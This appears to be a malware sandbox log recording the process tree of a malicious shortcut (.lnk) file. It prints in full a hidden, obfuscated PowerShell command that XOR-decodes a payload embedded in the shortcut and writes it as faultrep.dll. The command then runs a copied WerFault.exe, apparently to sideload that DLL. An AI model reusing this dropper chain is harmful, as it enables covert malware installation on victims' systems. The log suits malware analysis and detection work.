cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\e0c3282206b5533bb3272741212cb6e1.lnk
2548
cmd.exe "C:\Windows\system32\cmd.exe" /c copy C:\Windows\system32\WerFault.exe C:\Users\test22\AppData\Local\Temp\WerFault.exe && powershell -windowstyle hidden $0dda91a21b6f6536715eb83f21c75451 = G''et-Chil''dItem *.lnk ^| where-object {$_.length -eq 0x000449C8} ^| S''elect-Objec''t -ExpandProperty Name; $bdf6730d5c52821e237a7ceb47d8838d = gc $0dda91a21b6f6536715eb83f21c75451 -Encoding Byte; for($i=0; $i -lt $bdf6730d5c52821e237a7ceb47d8838d.count; $i++) { $bdf6730d5c52821e237a7ceb47d8838d[$i] = $bdf6730d5c52821e237a7ceb47d8838d[$i] -bxor 0x71 }; $e248d8a354f7be26afe13b86a3325e35 = 'C:\Users\test22\AppData\Local\Temp\faultrep.dll'; sc $e248d8a354f7be26afe13b86a3325e35 ([byte[]]($bdf6730d5c52821e237a7ceb47d8838d ^| select -Skip 012858)) -Encoding Byte; ^& C:\Users\test22\AppData\Local\Temp\WerFault.exe;
2660
powershell.exe powershell -windowstyle hidden $0dda91a21b6f6536715eb83f21c75451 = G''et-Chil''dItem *.lnk | where-object {$_.length -eq 0x000449C8} | S''elect-Objec''t -ExpandProperty Name; $bdf6730d5c52821e237a7ceb47d8838d = gc $0dda91a21b6f6536715eb83f21c75451 -Encoding Byte; for($i=0; $i -lt $bdf6730d5c52821e237a7ceb47d8838d.count; $i++) { $bdf6730d5c52821e237a7ceb47d8838d[$i] = $bdf6730d5c52821e237a7ceb47d8838d[$i] -bxor 0x71 }; $e248d8a354f7be26afe13b86a3325e35 = 'C:\Users\test22\AppData\Local\Temp\faultrep.dll'; sc $e248d8a354f7be26afe13b86a3325e35 ([byte[]]($bdf6730d5c52821e237a7ceb47d8838d | select -Skip 012858)) -Encoding Byte; & C:\Users\test22\AppData\Local\Temp\WerFault.exe;
2756
WerFault.exe "C:\Users\test22\AppData\Local\Temp\WerFault.exe"
2940